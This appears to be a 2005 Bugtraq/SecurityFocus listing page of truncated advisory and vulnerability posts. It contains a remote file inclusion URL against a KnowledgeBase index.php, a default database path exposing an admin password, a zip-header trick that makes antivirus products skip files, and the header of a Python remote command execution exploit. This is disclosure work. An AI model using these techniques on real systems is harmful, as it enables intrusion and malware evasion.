-----BEGIN PGP SIGNED MESSAGE-----

________________________________________________________________________
______

SUSE Security Announcement

Package: openslp
Announcement-ID: SUSE-SA:2005:015
Date: Mon, March

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- ------------------------------------------------------------------------
--

PACKAGE : gaim
SUMMARY : Fixes for gaim's vulnerabiliti

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 662-2 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
March 14th, 2005

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
$page = "startup";
}
@include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dom

[ more ]  [ reply ]

The problem is that the aeNovo database file "dbase/aeNovo1.mdb" by default is accessible. you can disclose the ADMIN's password .
The Login Page : "logon.asp"

[ more ]  [ reply ]

In-Reply-To: <20050311203150.17236.qmail (at) www.securityfocus (dot) com [email concealed]>

In Local file header if you modify "general purpose bit flag" 7th & 8'th byte of a zip archive with \x2f ie: "\" F-port, Kaspersky, Mcafee, Norman, Sybari, Symantec seem to skip the file marking it as clean!!! This was discovered durin

[ more ]  [ reply ]

- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
DATE : 2005-03-12 15:45 GMT
TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (ht

[ more ]  [ reply ]

Application: PlantinumFTP
Site: http://www.roboshareware.com/indexplatinumftp.php
Version: 1.0.18 and maybe lower
OS: Windows
Bug: Remote Denial of Service

=====
Product:
PlatinumFTPserver simplifies management of all your Ftp clients with
regards to sending and receiv

[ more ]  [ reply ]

Thats intersting.
I haven't tested my 2k3 box yet, but have tested against XP SP1
(Pentium 4 2.6G).
I didn't get the 100% load on the CPU that others have reported, but
did get symptoms.
I tried ports 135, 139 and 445.
When I tried ports 135 and 139 I saw the average CPU load on the
target machine a

[ more ]  [ reply ]

-=[ SecurityReason-2005-SRA#02 ]=-

-=[ Mass Full Path Disclosure in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on thei

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

3. Mysql CREATE FUNCTION libc arbitrary code execution.

Author: Stefano Di Paola
Vulnerable: Mysql <= 4.0.23, 4.1.10
Type of Vulnerability: Local/Remote - input validation
Tested On : Mandrake 10.1 /Debian Sarge
Vendor Status: Notified on March 2005

-- Description

If an authenticated user has I

[ more ]  [ reply ]

CALL FOR PAPERS: Speak at SummerCon 2005

http://www.summercon.org/rfp

SUMMERCON XVII Annual Conference on Computer Security
June 3-5, 2005 Austin, TX (USA)

Program Committee Chair: Mark Trumpbour
Organized by: The folks at SummerCon (http://www.summercon.org)
Theme for 2005: Tools of the Trade

T

[ more ]  [ reply ]

2. Mysql CREATE FUNCTION mysql.func table arbitrary library injection

Author: Stefano Di Paola
Vulnerable: Mysql <= 4.0.23, 4.1.10
Type of Vulnerability: Local/Remote Privileges Escalation - input
validation
Tested On : Mandrake 10.1 /Debian Sarge
Vendor Status: Notified on March 2005

-- Descr

[ more ]  [ reply ]

[badroot security] includer.cgi remote commands execution vulnerability
remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badroo

[ more ]  [ reply ]

[badroot security] includer.cgi remote commands execution vulnerability remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badro

[ more ]  [ reply ]

LSS Security Advisory #LSS-2005-03-05
http://security.lss.hr

---

Title : Ethereal remote buffer overflow #2
Advisory ID : LSS-2005-03-05
Date : 2005-03-10
Advisory URL: : http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
Impact : DoS and maybe possible code

[ more ]  [ reply ]

PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities

March 05 2005

For your consideration.

1. BACKGROUND
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,

[ more ]  [ reply ]

-=[ SecurityReason-2005-SRA#03 ]=-

-=[ SQL injection and XSS in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on their si

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

In-Reply-To: <20050310112622.4458.qmail (at) www.securityfocus (dot) com [email concealed]>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>Date: 10 Mar 2005 11:26:22 -0000

>From: Bipin Gautam <visitbipin (at) hotmail (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability.
>
>
>
>Mul

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.13 SQL error in session cXIb8O3.8]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 10.3.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board

[ more ]  [ reply ]